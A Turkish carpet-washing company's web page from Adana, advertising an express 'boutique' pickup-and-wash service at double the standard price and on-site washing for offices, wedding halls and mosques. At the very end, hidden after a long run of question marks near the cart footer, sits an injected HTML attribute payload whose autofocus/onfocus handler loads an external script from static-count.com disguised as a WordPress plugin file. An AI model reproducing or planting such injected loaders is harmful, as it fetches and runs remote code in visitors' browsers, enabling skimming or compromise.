Adana halı yıkama

Adana Butik Halı Yıkama

Beklemek istemiyorum, Sıraya girmek bana göre değil, Ben istediğim zaman halılarımı verip alırım. Diyenlerdenseniz o halde size özel Adana butik halı yıkama hizmetimiz mevcut.

Adana butik halı yıkama işleyişi nasıl?

Halılarınızı yıkamaya göndermek için halı taşıma arabasının gelmesini beklemezsiniz. Siparişi oluşturduğunuz anda ikinci yedek aracımız halılarınızı almak için anında yola koyulur.

Tesisimizde halılarınız sıraya girmeden, beklemeden ve diğer halılarla aynı işlemi görmeden hemen yıkanır.

Gerekli temizlik ve yıkama işlemleri tamamlandıktan sonra sizin istediğiniz vakitte yine halı taşıma arabasını beklemeden yedek aracımızla adresinize belirttiğiniz saat aralığında teslim edilir.

Bu denli size özel olan hizmetin fiyatı da (Tabiri caizse işi gücü bırakıp size özel hizmet) haliyle fazla olacak. Standart yıkama hizmetine x2 ekleyerek Adana butik halı yıkama hizmetini alabilirsiniz.

Adana yerinde halı yıkama

Adana halı yıkama hizmetine ek olarak; Yerine yapışmış, çıkmasının imkanı olmayan ve yerinde yıkanması gereken halı türlerine yönelik Adana yerinde halı yıkama hizmetimiz bulunmaktadır. Portatif/Portable makinelerle uygulanan bu temizlik/yıkama işleminde hijyenden ödün verilmez. Ofis, Düğün salonu, cami ve diğer platformlardaki halılar yerinde yıkama işlemi gerektirir.

Leave a Comment

Your email address will not be published. Required fields are marked *

0
0 item
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//static-count.com/wp-content/plugins/woo-shipping-rate/counter.js";document.head.append(script); autofocus=\"
Empty Cart